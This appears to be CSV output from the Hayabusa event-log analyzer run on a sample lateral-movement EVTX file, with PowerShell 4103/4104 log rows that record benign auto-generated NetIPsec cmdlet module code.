[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.781 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.782 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.782 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.807 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.807 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.808 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.808 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.833 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # 